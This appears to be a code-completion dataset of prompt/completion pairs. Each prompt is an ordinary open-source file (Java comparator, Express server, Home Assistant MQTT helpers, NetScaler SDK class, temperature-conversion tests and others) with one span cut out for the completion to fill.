| prompt (large_string, length 70-991k) | completion (large_string, length 0-1.02k) |
| --- | --- |
<|file_name|>BeanPropertyComparator.java<|end_file_name|><|fim▁begin|>/**
* Copyright 2005-2015 The Kuali Foundation
*
* Licensed under the Educational Community License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.opensource.org/licenses/ecl2.php
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.kuali.rice.krad.util;
import org.apache.commons.beanutils.PropertyUtils;
import org.apache.commons.collections.comparators.ComparableComparator;
import org.kuali.rice.core.api.exception.KualiException;
import org.kuali.rice.core.api.util.type.TypeUtils;
import java.beans.PropertyDescriptor;
import java.io.Serializable;
import java.lang.reflect.InvocationTargetException;
import java.util.Collections;
import java.util.Comparator;
import java.util.Iterator;
import java.util.List;
/**
* BeanPropertyComparator compares two beans using multiple property names.
*/
public class BeanPropertyComparator implements Comparator, Serializable {
private static final long serialVersionUID = -2675700473766186018L;
boolean ignoreCase;
private List propertyNames;
private Comparator stringComparator;
private Comparator booleanComparator;
private Comparator genericComparator;
/**
* Constructs a BeanPropertyComparator for comparing beans using the properties named in the given List
*
* <p>Properties will be compared in the order in which they are listed. Case will be ignored
* in String comparisons.</p>
*
* @param propertyNames List of property names (as Strings) used to compare beans
*/
public BeanPropertyComparator(List propertyNames) {
this(propertyNames, true);
}
/**
* Constructs a BeanPropertyComparator for comparing beans using the properties named in the given List.
*
* <p>Properties will be compared
* in the order in which they are listed. Case will be ignored if ignoreCase is true.</p>
*
* @param propertyNames List of property names (as Strings) used to compare beans
* @param ignoreCase if true, case will be ignored during String comparisons
*/
public BeanPropertyComparator(List propertyNames, boolean ignoreCase) {
if (propertyNames == null) {
throw new IllegalArgumentException("invalid (null) propertyNames list");
}
if (propertyNames.size() == 0) {
throw new IllegalArgumentException("invalid (empty) propertyNames list");
}
this.propertyNames = Collections.unmodifiableList(propertyNames);
this.ignoreCase = ignoreCase;
if (ignoreCase) {
this.stringComparator = String.CASE_INSENSITIVE_ORDER;
}
else {
this.stringComparator = ComparableComparator.getInstance();
}
this.booleanComparator = new Comparator() {
public int compare(Object o1, Object o2) {
int compared = 0;
Boolean b1 = (Boolean) o1;
Boolean b2 = (Boolean) o2;
if (!b1.equals(b2)) {
if (b1.equals(Boolean.FALSE)) {
compared = -1;
}
else {
compared = 1;
}
}
return compared;
}
};
this.genericComparator = ComparableComparator.getInstance();
}
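// Illustrative usage sketch (not part of the original class; the Person bean
// and its accessors are hypothetical, and Arrays.asList would need an extra
// import here). Sorts by lastName, then firstName, ignoring case:
//
//   List people = loadPeople();
//   Collections.sort(people,
//       new BeanPropertyComparator(Arrays.asList("lastName", "firstName"), true));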
/**
* Compare two JavaBeans by the properties given to the constructor.
*
* @param o1 the first bean to compare
* @param o2 the second bean to compare
* @return a negative, zero, or positive integer as o1 orders before, equal to, or after o2
*/
public int compare(Object o1, Object o2) {
int compared = 0;
try {<|fim▁hole|> Comparator currentComparator = null;
try {
PropertyDescriptor propertyDescriptor = PropertyUtils.getPropertyDescriptor(o1, currentProperty);
Class propertyClass = propertyDescriptor.getPropertyType();
if (propertyClass.equals(String.class)) {
currentComparator = this.stringComparator;
}
else if (TypeUtils.isBooleanClass(propertyClass)) {
currentComparator = this.booleanComparator;
}
else {
currentComparator = this.genericComparator;
}
}
catch (NullPointerException e) {
throw new BeanComparisonException("unable to find property '" + o1.getClass().getName() + "." + currentProperty + "'", e);
}
// compare the values
Object value1 = PropertyUtils.getProperty(o1, currentProperty);
Object value2 = PropertyUtils.getProperty(o2, currentProperty);
/* Fix for KULRICE-5170 : BeanPropertyComparator throws exception when a null value is found in sortable non-string data type column */
if ( value1 == null && value2 == null)
return 0;
else if ( value1 == null)
return -1;
else if ( value2 == null )
return 1;
/* End KULRICE-5170 Fix*/
compared = currentComparator.compare(value1, value2);
}
}
catch (IllegalAccessException e) {
throw new BeanComparisonException("unable to compare property values", e);
}
catch (NoSuchMethodException e) {
throw new BeanComparisonException("unable to compare property values", e);
}
catch (InvocationTargetException e) {
throw new BeanComparisonException("unable to compare property values", e);
}
return compared;
}
public static class BeanComparisonException extends KualiException {
private static final long serialVersionUID = 2622379680100640029L;
/**
* @param message
* @param t
*/
public BeanComparisonException(String message, Throwable t) {
super(message, t);
}
}
}<|fim▁end|> | for (Iterator i = propertyNames.iterator(); (compared == 0) && i.hasNext();) {
String currentProperty = i.next().toString();
// choose appropriate comparator |
<|file_name|>server.js<|end_file_name|><|fim▁begin|>var express = require('express');
var http = require('http');
var path = require('path');
var app = express();
app.use(express.bodyParser());
app.use(app.router);
app.use(express.static(__dirname + '/public'));
// Simple REST server.
var users = [];
app.post('/user', function(req, res) {
users[req.body.name] = req.body;
res.send({ error: false });
});
app.get('/user/:name', function(req, res) {
var user = users[req.params.name];
if (user) {
res.send({ error: false, data: user });
} else {
res.send({ error: true });
}
});
app.put('/user/:name', function(req, res) {
var user = users[req.params.name];
if (user) {
user.weight = req.body.weight;
res.send({ error: false });
} else {
res.send({ error: true });<|fim▁hole|>app.del('/user/:name', function(req, res) {
var user = users[req.params.name];
if (user) {
delete users[req.params.name];
res.send({ error: false });
} else {
res.send({ error: true });
}
});
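// Example requests against this server once it is listening on port 4444
// (names and values are illustrative):
//   curl -X POST -d 'name=bob&weight=70' http://localhost:4444/user
//   curl http://localhost:4444/user/bob
//   curl -X PUT -d 'weight=72' http://localhost:4444/user/bob
//   curl -X DELETE http://localhost:4444/user/bob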
// XMLJSON file
app.get('/xhr-json.js', function(req, res) {
res.sendfile('xhr-json.js', { root: __dirname + '/..' });
});
// Mocha/Chai files
var mochaDir = path.dirname(require.resolve('mocha'));
var chaiDir = path.dirname(require.resolve('chai'));
app.get('/mocha.css', function(req, res) {
res.sendfile('mocha.css', { root: mochaDir });
});
app.get('/mocha.js', function(req, res) {
res.sendfile('mocha.js', { root: mochaDir });
});
app.get('/chai.js', function(req, res) {
res.sendfile('chai.js', { root: chaiDir });
});
http.createServer(app).listen(4444, function() {
console.log('Express server listening.');
});<|fim▁end|> | }
});
|
<|file_name|>debug_info.py<|end_file_name|><|fim▁begin|>"""Helper to handle a set of topics to subscribe to."""
from __future__ import annotations
from collections import deque
from collections.abc import Callable
import datetime as dt
from functools import wraps
from typing import Any
import attr
from homeassistant.core import HomeAssistant
from homeassistant.helpers import entity_registry as er
from homeassistant.util import dt as dt_util
from .const import ATTR_DISCOVERY_PAYLOAD, ATTR_DISCOVERY_TOPIC
from .models import MessageCallbackType, PublishPayloadType
DATA_MQTT_DEBUG_INFO = "mqtt_debug_info"
STORED_MESSAGES = 10
def initialize(hass: HomeAssistant):
"""Initialize MQTT debug info."""
hass.data[DATA_MQTT_DEBUG_INFO] = {"entities": {}, "triggers": {}}
def log_messages(
hass: HomeAssistant, entity_id: str
) -> Callable[[MessageCallbackType], MessageCallbackType]:
"""Wrap an MQTT message callback to support message logging."""
def _log_message(msg):
"""Log message."""
debug_info = hass.data[DATA_MQTT_DEBUG_INFO]
messages = debug_info["entities"][entity_id]["subscriptions"][
msg.subscribed_topic
]["messages"]
if msg not in messages:
messages.append(msg)
def _decorator(msg_callback: MessageCallbackType) -> MessageCallbackType:
@wraps(msg_callback)
def wrapper(msg: Any) -> None:
"""Log message."""
_log_message(msg)
msg_callback(msg)
setattr(wrapper, "__entity_id", entity_id)
return wrapper
return _decorator
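# Illustrative usage sketch (the entity id and callback are hypothetical):
#
#   wrapped = log_messages(hass, "sensor.example")(message_received)
#
# `wrapped` records each incoming message in the debug-info store before
# delegating to the original callback.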
@attr.s(slots=True, frozen=True)
class TimestampedPublishMessage:
"""MQTT Message."""
topic: str = attr.ib()
payload: PublishPayloadType = attr.ib()
qos: int = attr.ib()
retain: bool = attr.ib()
timestamp: dt.datetime = attr.ib(default=None)
def log_message(
hass: HomeAssistant,<|fim▁hole|> topic: str,
payload: PublishPayloadType,
qos: int,
retain: bool,
) -> None:
"""Log an outgoing MQTT message."""
debug_info = hass.data[DATA_MQTT_DEBUG_INFO]
entity_info = debug_info["entities"].setdefault(
entity_id, {"subscriptions": {}, "discovery_data": {}, "transmitted": {}}
)
if topic not in entity_info["transmitted"]:
entity_info["transmitted"][topic] = {
"messages": deque([], STORED_MESSAGES),
}
msg = TimestampedPublishMessage(
topic, payload, qos, retain, timestamp=dt_util.utcnow()
)
entity_info["transmitted"][topic]["messages"].append(msg)
def add_subscription(hass, message_callback, subscription):
"""Prepare debug data for subscription."""
if entity_id := getattr(message_callback, "__entity_id", None):
debug_info = hass.data[DATA_MQTT_DEBUG_INFO]
entity_info = debug_info["entities"].setdefault(
entity_id, {"subscriptions": {}, "discovery_data": {}, "transmitted": {}}
)
if subscription not in entity_info["subscriptions"]:
entity_info["subscriptions"][subscription] = {
"count": 0,
"messages": deque([], STORED_MESSAGES),
}
entity_info["subscriptions"][subscription]["count"] += 1
def remove_subscription(hass, message_callback, subscription):
"""Remove debug data for subscription if it exists."""
entity_id = getattr(message_callback, "__entity_id", None)
if entity_id and entity_id in hass.data[DATA_MQTT_DEBUG_INFO]["entities"]:
hass.data[DATA_MQTT_DEBUG_INFO]["entities"][entity_id]["subscriptions"][
subscription
]["count"] -= 1
if not hass.data[DATA_MQTT_DEBUG_INFO]["entities"][entity_id]["subscriptions"][
subscription
]["count"]:
hass.data[DATA_MQTT_DEBUG_INFO]["entities"][entity_id]["subscriptions"].pop(
subscription
)
def add_entity_discovery_data(hass, discovery_data, entity_id):
"""Add discovery data."""
debug_info = hass.data[DATA_MQTT_DEBUG_INFO]
entity_info = debug_info["entities"].setdefault(
entity_id, {"subscriptions": {}, "discovery_data": {}, "transmitted": {}}
)
entity_info["discovery_data"] = discovery_data
def update_entity_discovery_data(hass, discovery_payload, entity_id):
"""Update discovery data."""
entity_info = hass.data[DATA_MQTT_DEBUG_INFO]["entities"][entity_id]
entity_info["discovery_data"][ATTR_DISCOVERY_PAYLOAD] = discovery_payload
def remove_entity_data(hass, entity_id):
"""Remove discovery data."""
if entity_id in hass.data[DATA_MQTT_DEBUG_INFO]["entities"]:
hass.data[DATA_MQTT_DEBUG_INFO]["entities"].pop(entity_id)
def add_trigger_discovery_data(hass, discovery_hash, discovery_data, device_id):
"""Add discovery data."""
debug_info = hass.data[DATA_MQTT_DEBUG_INFO]
debug_info["triggers"][discovery_hash] = {
"device_id": device_id,
"discovery_data": discovery_data,
}
def update_trigger_discovery_data(hass, discovery_hash, discovery_payload):
"""Update discovery data."""
trigger_info = hass.data[DATA_MQTT_DEBUG_INFO]["triggers"][discovery_hash]
trigger_info["discovery_data"][ATTR_DISCOVERY_PAYLOAD] = discovery_payload
def remove_trigger_discovery_data(hass, discovery_hash):
"""Remove discovery data."""
hass.data[DATA_MQTT_DEBUG_INFO]["triggers"].pop(discovery_hash)
def _info_for_entity(hass: HomeAssistant, entity_id: str) -> dict[str, Any]:
mqtt_debug_info = hass.data[DATA_MQTT_DEBUG_INFO]
entity_info = mqtt_debug_info["entities"][entity_id]
subscriptions = [
{
"topic": topic,
"messages": [
{
"payload": str(msg.payload),
"qos": msg.qos,
"retain": msg.retain,
"time": msg.timestamp,
"topic": msg.topic,
}
for msg in subscription["messages"]
],
}
for topic, subscription in entity_info["subscriptions"].items()
]
transmitted = [
{
"topic": topic,
"messages": [
{
"payload": str(msg.payload),
"qos": msg.qos,
"retain": msg.retain,
"time": msg.timestamp,
"topic": msg.topic,
}
for msg in subscription["messages"]
],
}
for topic, subscription in entity_info["transmitted"].items()
]
discovery_data = {
"topic": entity_info["discovery_data"].get(ATTR_DISCOVERY_TOPIC, ""),
"payload": entity_info["discovery_data"].get(ATTR_DISCOVERY_PAYLOAD, ""),
}
return {
"entity_id": entity_id,
"subscriptions": subscriptions,
"discovery_data": discovery_data,
"transmitted": transmitted,
}
def _info_for_trigger(hass: HomeAssistant, trigger_key: str) -> dict[str, Any]:
mqtt_debug_info = hass.data[DATA_MQTT_DEBUG_INFO]
trigger = mqtt_debug_info["triggers"][trigger_key]
discovery_data = None
if trigger["discovery_data"] is not None:
discovery_data = {
"topic": trigger["discovery_data"][ATTR_DISCOVERY_TOPIC],
"payload": trigger["discovery_data"][ATTR_DISCOVERY_PAYLOAD],
}
return {"discovery_data": discovery_data, "trigger_key": trigger_key}
def info_for_config_entry(hass):
"""Get debug info for all entities and triggers."""
mqtt_info = {"entities": [], "triggers": []}
mqtt_debug_info = hass.data[DATA_MQTT_DEBUG_INFO]
for entity_id in mqtt_debug_info["entities"]:
mqtt_info["entities"].append(_info_for_entity(hass, entity_id))
for trigger_key in mqtt_debug_info["triggers"]:
mqtt_info["triggers"].append(_info_for_trigger(hass, trigger_key))
return mqtt_info
def info_for_device(hass, device_id):
"""Get debug info for a device."""
mqtt_info = {"entities": [], "triggers": []}
entity_registry = er.async_get(hass)
entries = er.async_entries_for_device(
entity_registry, device_id, include_disabled_entities=True
)
mqtt_debug_info = hass.data[DATA_MQTT_DEBUG_INFO]
for entry in entries:
if entry.entity_id not in mqtt_debug_info["entities"]:
continue
mqtt_info["entities"].append(_info_for_entity(hass, entry.entity_id))
for trigger_key, trigger in mqtt_debug_info["triggers"].items():
if trigger["device_id"] != device_id:
continue
mqtt_info["triggers"].append(_info_for_trigger(hass, trigger_key))
return mqtt_info<|fim▁end|> | entity_id: str, |
<|file_name|>auditmessages.py<|end_file_name|><|fim▁begin|>#
# Copyright (c) 2008-2015 Citrix Systems, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License")
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_resource
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_response
from nssrc.com.citrix.netscaler.nitro.service.options import options
from nssrc.com.citrix.netscaler.nitro.exception.nitro_exception import nitro_exception
from nssrc.com.citrix.netscaler.nitro.util.nitro_util import nitro_util<|fim▁hole|> """ Configuration for audit message resource. """
def __init__(self) :
self._loglevel = []
self._numofmesgs = 0
self._value = ""
self.___count = 0
@property
def loglevel(self) :
"""Audit log level filter, which specifies the types of events to display.
The following loglevels are valid:
* ALL - All events.
* EMERGENCY - Events that indicate an immediate crisis on the server.
* ALERT - Events that might require action.
* CRITICAL - Events that indicate an imminent server crisis.
* ERROR - Events that indicate some type of error.
* WARNING - Events that require action in the near future.
* NOTICE - Events that the administrator should know about.
* INFORMATIONAL - All but low-level events.
* DEBUG - All events, in extreme detail.<br/>Possible values = ALL, EMERGENCY, ALERT, CRITICAL, ERROR, WARNING, NOTICE, INFORMATIONAL, DEBUG.
"""
try :
return self._loglevel
except Exception as e:
raise e
@loglevel.setter
def loglevel(self, loglevel) :
"""Audit log level filter, which specifies the types of events to display.
The following loglevels are valid:
* ALL - All events.
* EMERGENCY - Events that indicate an immediate crisis on the server.
* ALERT - Events that might require action.
* CRITICAL - Events that indicate an imminent server crisis.
* ERROR - Events that indicate some type of error.
* WARNING - Events that require action in the near future.
* NOTICE - Events that the administrator should know about.
* INFORMATIONAL - All but low-level events.
* DEBUG - All events, in extreme detail.<br/>Possible values = ALL, EMERGENCY, ALERT, CRITICAL, ERROR, WARNING, NOTICE, INFORMATIONAL, DEBUG
"""
try :
self._loglevel = loglevel
except Exception as e:
raise e
@property
def numofmesgs(self) :
"""Number of log messages to be displayed.<br/>Default value: 20<br/>Minimum length = 1<br/>Maximum length = 256.
"""
try :
return self._numofmesgs
except Exception as e:
raise e
@numofmesgs.setter
def numofmesgs(self, numofmesgs) :
"""Number of log messages to be displayed.<br/>Default value: 20<br/>Minimum length = 1<br/>Maximum length = 256
"""
try :
self._numofmesgs = numofmesgs
except Exception as e:
raise e
@property
def value(self) :
"""The Audit message.
"""
try :
return self._value
except Exception as e:
raise e
def _get_nitro_response(self, service, response) :
""" converts nitro response into object and returns the object array in case of get request.
"""
try :
result = service.payload_formatter.string_to_resource(auditmessages_response, response, self.__class__.__name__)
if(result.errorcode != 0) :
if (result.errorcode == 444) :
service.clear_session(self)
if result.severity :
if (result.severity == "ERROR") :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
else :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
return result.auditmessages
except Exception as e :
raise e
def _get_object_name(self) :
""" Returns the value of object identifier argument
"""
try :
return None
except Exception as e :
raise e
@classmethod
def get(cls, client, name="", option_="") :
""" Use this API to fetch all the auditmessages resources that are configured on netscaler.
"""
try :
if not name :
obj = auditmessages()
response = obj.get_resources(client, option_)
return response
except Exception as e :
raise e
@classmethod
def get_args(cls, client, args) :
""" Use this API to fetch all the auditmessages resources that are configured on netscaler.
# This uses auditmessages_args which is a way to provide additional arguments while fetching the resources.
"""
try :
obj = auditmessages()
option_ = options()
option_.args = nitro_util.object_to_string_withoutquotes(args)
response = obj.get_resources(client, option_)
return response
except Exception as e :
raise e
@classmethod
def get_filtered(cls, client, filter_) :
""" Use this API to fetch filtered set of auditmessages resources.
filter string should be in JSON format.eg: "port:80,servicetype:HTTP".
"""
try :
obj = auditmessages()
option_ = options()
option_.filter = filter_
response = obj.getfiltered(client, option_)
return response
except Exception as e :
raise e
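# Illustrative usage sketch (`client` is assumed to be an authenticated
# nitro_service session):
#
#   errors = auditmessages.get_filtered(client, "loglevel:ERROR")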
@classmethod
def count(cls, client) :
""" Use this API to count the auditmessages resources configured on NetScaler.
"""
try :
obj = auditmessages()
option_ = options()
option_.count = True
response = obj.get_resources(client, option_)
if response :
return response[0].__dict__['___count']
return 0
except Exception as e :
raise e
@classmethod
def count_filtered(cls, client, filter_) :
""" Use this API to count filtered the set of auditmessages resources.
Filter string should be in JSON format.eg: "port:80,servicetype:HTTP".
"""
try :
obj = auditmessages()
option_ = options()
option_.count = True
option_.filter = filter_
response = obj.getfiltered(client, option_)
if response :
return response[0].__dict__['___count']
return 0
except Exception as e :
raise e
class Loglevel:
ALL = "ALL"
EMERGENCY = "EMERGENCY"
ALERT = "ALERT"
CRITICAL = "CRITICAL"
ERROR = "ERROR"
WARNING = "WARNING"
NOTICE = "NOTICE"
INFORMATIONAL = "INFORMATIONAL"
DEBUG = "DEBUG"
class auditmessages_response(base_response) :
def __init__(self, length=1) :
self.auditmessages = []
self.errorcode = 0
self.message = ""
self.severity = ""
self.sessionid = ""
self.auditmessages = [auditmessages() for _ in range(length)]<|fim▁end|> |
class auditmessages(base_resource) : |
<|file_name|>baidu.js<|end_file_name|><|fim▁begin|>var mongoose = require('mongoose');
var Post = require('../models/Post').Post;
var config = require('../config');
var http = require('http');<|fim▁hole|>var site = "";
var token = "";
var options = {
host: 'data.zz.baidu.com',
path: '/urls?site=' + site + '&token=' + token,
method: 'POST',
headers: {
'Accept': '*/*',
'Connection': 'Keep-Alive',
'User-Agent': 'curl/7.12.1 '
}
};
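// Note: `site` and `token` above are left empty and must be filled in with
// the values issued by Baidu webmaster tools before this script will work;
// the endpoint expects the URL list as a newline-separated POST body (built
// below with urls.join('\n')).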
var callback = function (res) {
var buffers = [];
var nread = 0;
res.on('data', function (chunk) {
buffers.push(chunk);
nread += chunk.length;
});
res.on('end', function () {
console.log(buffers);
});
}
var req = http.request(options, callback);
mongoose.connect(config.db.production);
var db = mongoose.connection;
db.once('open', function (callback) {
Post.find({}, {pid: 1})
.exec(function (err, posts) {
var urls = posts.map(function (post) {
return 'http://' + config.site.url + '/post/' + post.pid;
});
var data = urls.join('\n');
console.log(data,urls.length);
req.write(data);
req.end();
});
});<|fim▁end|> | |
<|file_name|>backend.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
# Copyright(C) 2013 Julien Veyssier
#
# This file is part of weboob.
#
# weboob is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# weboob is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with weboob. If not, see <http://www.gnu.org/licenses/>.
from weboob.capabilities.recipe import ICapRecipe, Recipe
from weboob.tools.backend import BaseBackend
from .browser import SevenFiftyGramsBrowser
import unicodedata
def strip_accents(s):
return ''.join(c for c in unicodedata.normalize('NFD', s) if unicodedata.category(c) != 'Mn')
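# e.g. strip_accents(u'crème brûlée') == u'creme brulee' -- NFD decomposition
# splits each accented character into a base letter plus combining marks
# (category 'Mn'), which are then dropped.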
__all__ = ['SevenFiftyGramsBackend']
class SevenFiftyGramsBackend(BaseBackend, ICapRecipe):
NAME = '750g'
MAINTAINER = u'Julien Veyssier'
EMAIL = '[email protected]'
VERSION = '0.h'
DESCRIPTION = u'750g French recipe website'
LICENSE = 'AGPLv3+'
BROWSER = SevenFiftyGramsBrowser
def get_recipe(self, id):
return self.browser.get_recipe(id)
def iter_recipes(self, pattern):
return self.browser.iter_recipes(strip_accents(unicode(pattern)).encode('utf-8'))
def fill_recipe(self, recipe, fields):
if 'nb_person' in fields or 'instructions' in fields:
rec = self.get_recipe(recipe.id)
recipe.picture_url = rec.picture_url<|fim▁hole|> recipe.ingredients = rec.ingredients
recipe.comments = rec.comments
recipe.author = rec.author
recipe.nb_person = rec.nb_person
recipe.cooking_time = rec.cooking_time
recipe.preparation_time = rec.preparation_time
return recipe
OBJECTS = {
Recipe: fill_recipe,
}<|fim▁end|> | recipe.instructions = rec.instructions |
<|file_name|>test_temp.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python
#
# Unit Tests for temp module
#
# See __usage__ for an explanation of runtime arguments.
#
# -Christopher Blunck
#
import sys
import unittest
from ..temp import *
__author__ = 'Christopher Blunck'
__email__ = '[email protected]'
__revision__ = '$Revision: 1.6 $'
__doc__ = '''
Unit tests the temp module.
'''
__usage__ = '''
python $0
'''
def usage():
print(__usage__)
sys.exit(1)
class TestCase(unittest.TestCase):
def setUp(self): pass
def tearDown(self): pass
def test__calc_heat_index(self):
# if the temperature is < 80, heat index == temperature
assert calc_heat_index(70, 100) == 70 , "value not correct"
assert calc_heat_index(79.9, 100) == 79.9 , "value not correct"
assert calc_heat_index(80, 100) != 80 , "value not correct"
# make sure some hard-coded values work
assert int(calc_heat_index(80, 100)) == 87, "value not correct"
assert int(calc_heat_index(80, 10)) == 78, "value not correct"
assert int(calc_heat_index(90, 50)) == 94, "value not correct"
assert int(calc_heat_index(120, 100)) == 380, "value not correct"
def test__calc_wind_chill(self):
# make sure some hard-coded values work
assert int(calc_wind_chill(80, 10)) == 83, "value not correct"
assert int(calc_wind_chill(32, 10)) == 23, "value not correct"
assert int(calc_wind_chill(-20, 5)) == -34, "value not correct"
def test__fahrenheit_to_celsius(self):
# make sure some special values work
assert int(fahrenheit_to_celsius(32)) == 0, "value not correct"
assert int(fahrenheit_to_celsius(212)) == 100, "value not correct"
# make sure some hard coded values work
assert int(fahrenheit_to_celsius(60)) == 15, "value not correct"
assert int(fahrenheit_to_celsius(-60)) == -51, "value not correct"
assert int(fahrenheit_to_celsius(90)) == 32, "value not correct"
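# (The conversion under test is C = (F - 32) * 5 / 9, so e.g.
# fahrenheit_to_celsius(90) is about 32.22, which int() truncates to 32.)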
def test__celsius_to_fahrenheit(self):
# make sure some special values work
assert int(celsius_to_fahrenheit(0)) == 32, "value not correct"
assert int(celsius_to_fahrenheit(100)) == 212, "value not correct"
# make sure some hard coded values work
assert int(celsius_to_fahrenheit(60)) == 140, "value not correct"
assert int(celsius_to_fahrenheit(-60)) == -76, "value not correct"
assert int(celsius_to_fahrenheit(30)) == 86, "value not correct"
def test__celsius_to_kelvin(self):
# make sure some special values work
assert int(celsius_to_kelvin(-273.15)) == 0, "value not correct"
assert int(celsius_to_kelvin(100)) == 373, "value not correct"
# make sure some hard coded values work
assert int(celsius_to_kelvin(60)) == 333, "value not correct"
assert int(celsius_to_kelvin(-60)) == 213, "value not correct"
assert int(celsius_to_kelvin(30)) == 303, "value not correct"
def test__celsius_to_rankine(self):
# make sure some special values work
assert int(celsius_to_rankine(0)) == 491, "value not correct"
assert int(celsius_to_rankine(100)) == 671, "value not correct"
# make sure some hard coded values work
assert int(celsius_to_rankine(60)) == 599, "value not correct"
assert int(celsius_to_rankine(-60)) == 383, "value not correct"
assert int(celsius_to_rankine(30)) == 545, "value not correct"
def test__fahrenheit_to_kelvin(self):
# make sure some special values work
assert int(fahrenheit_to_kelvin(32)) == 273, "value not correct"
assert int(fahrenheit_to_kelvin(212)) == 373, "value not correct"
# make sure some hard coded values work
assert int(fahrenheit_to_kelvin(60)) == 288, "value not correct"
assert int(fahrenheit_to_kelvin(-60)) == 222, "value not correct"
assert int(fahrenheit_to_kelvin(90)) == 305, "value not correct"
def test__fahrenheit_to_rankine(self):
# make sure some special values work
assert int(fahrenheit_to_rankine(32)) == 491, "value not correct"
assert int(fahrenheit_to_rankine(212)) == 671, "value not correct"
# make sure some hard coded values work
assert int(fahrenheit_to_rankine(60)) == 519, "value not correct"
assert int(fahrenheit_to_rankine(-60)) == 399, "value not correct"
assert int(fahrenheit_to_rankine(90)) == 549, "value not correct"
def test__kelvin_to_celsius(self):
# make sure some special values work
assert int(kelvin_to_celsius(273.15)) == 0, "value not correct"
assert int(kelvin_to_celsius(373.15)) == 100, "value not correct"
# make sure some hard coded values work
assert int(kelvin_to_celsius(0)) == -273, "value not correct"
assert int(kelvin_to_celsius(293.15)) == 20, "value not correct"
assert int(kelvin_to_celsius(343.15)) == 70, "value not correct"
def test__kelvin_to_fahrenheit(self):
# make sure some special values work
assert int(kelvin_to_fahrenheit(273.15)) == 32, "value not correct"
assert int(kelvin_to_fahrenheit(373.15)) == 212, "value not correct"
# make sure some hard coded values work
assert int(kelvin_to_fahrenheit(0)) == -459, "value not correct"
assert int(kelvin_to_fahrenheit(293.15)) == 68, "value not correct"
assert int(kelvin_to_fahrenheit(343.15)) == 158, "value not correct"
def test__kelvin_to_rankine(self):
# make sure some special values work
assert int(kelvin_to_rankine(273.15)) == 491, "value not correct"
assert int(kelvin_to_rankine(373.15)) == 671, "value not correct"
# make sure some hard coded values work
assert int(kelvin_to_rankine(0)) == 0, "value not correct"
assert int(kelvin_to_rankine(293.15)) == 527, "value not correct"
assert int(kelvin_to_rankine(343.15)) == 617, "value not correct"
def test__rankine_to_celsius(self):
# make sure some special values work
assert int(rankine_to_celsius(491)) == 0, "value not correct"
assert int(rankine_to_celsius(671)) == 99, "value not correct"
# make sure some hard coded values work
assert int(rankine_to_celsius(0)) == -273, "value not correct"
assert int(rankine_to_celsius(527)) == 19, "value not correct"
assert int(rankine_to_celsius(617)) == 69, "value not correct"
def test__rankine_to_fahrenheit(self):
# make sure some special values work
assert int(rankine_to_fahrenheit(491)) == 31, "value not correct"
assert int(rankine_to_fahrenheit(671)) == 211, "value not correct"
# make sure some hard coded values work
assert int(rankine_to_fahrenheit(0)) == -459, "value not correct"
assert int(rankine_to_fahrenheit(527)) == 67, "value not correct"
assert int(rankine_to_fahrenheit(617)) == 157, "value not correct"
def test__rankine_to_kelvin(self):
# make sure some special values work
assert int(rankine_to_kelvin(491)) == 272, "value not correct"
assert int(rankine_to_kelvin(671)) == 372, "value not correct"
# make sure some hard coded values work
assert int(rankine_to_kelvin(0)) == 0, "value not correct"
assert int(rankine_to_kelvin(527)) == 292, "value not correct"
assert int(rankine_to_kelvin(617)) == 342, "value not correct"
def test__dewpoint(self):<|fim▁hole|> # make sure some hard coded values work
assert int(calc_dewpoint(12, 72)) == 4, "value not correct"
assert int(calc_dewpoint(75, 33)) == 43, "value not correct"
assert int(calc_dewpoint(90, 85)) == 84, "value not correct"
def test__humidity(self):
# make sure some hard coded values work
assert int(calc_humidity(87, 76) * 100) == 69, "value not correct"
assert int(calc_humidity(75, 45) * 100) == 34, "value not correct"
assert int(calc_humidity(50, 10) * 100) == 19, "value not correct"
assert int(calc_humidity(100, 88) * 100) == 68, "value not correct"
def main():
suite = unittest.makeSuite(TestCase, 'test')
runner = unittest.TextTestRunner()
runner.run(suite)
if __name__ == '__main__':
main()<|fim▁end|> | |
<|file_name|>plug.go<|end_file_name|><|fim▁begin|>package xrest
type Plugger interface {
Plug(Handler) Handler<|fim▁hole|><|fim▁end|> | } |
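// Illustrative sketch (not part of the original package): a minimal Plugger.
// A real plug would wrap `next` with extra behaviour (logging, auth, etc.)
// before delegating; this no-op version returns it unchanged.
//
//   type noopPlug struct{}
//
//   func (p noopPlug) Plug(next Handler) Handler {
//       return next
//   }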
<|file_name|>buddhist.js.uncompressed.js<|end_file_name|><|fim▁begin|><|fim▁hole|>version https://git-lfs.github.com/spec/v1
oid sha256:ff6a5c1204e476c89870c6f14e75db666fa26de9359f9d8c372ef779b55c8875
size 2736<|fim▁end|> | |
<|file_name|>Socket.js<|end_file_name|><|fim▁begin|>var socketio = require('socket.io'),
dotProp = require('dot-prop');
/**
* Constructs a Socket.
* Socket manager powered by Socket.IO.
*
* @constructor
*/
function Socket(){
this.port = null;
this.io = null;
this.scope = {};
}
Socket.prototype.start = function () {
var self = this;
var settings = self.scope.settings();
self.io = socketio(settings.socket.port);
self.io.on('connection', function (socket) {
socket.emit('structure', {key: self.scope.key, title: self.scope.title, sub: self.scope.sub});<|fim▁hole|> });
});
return self;
};
module.exports = new Socket();<|fim▁end|> | socket.on('call', function(data){
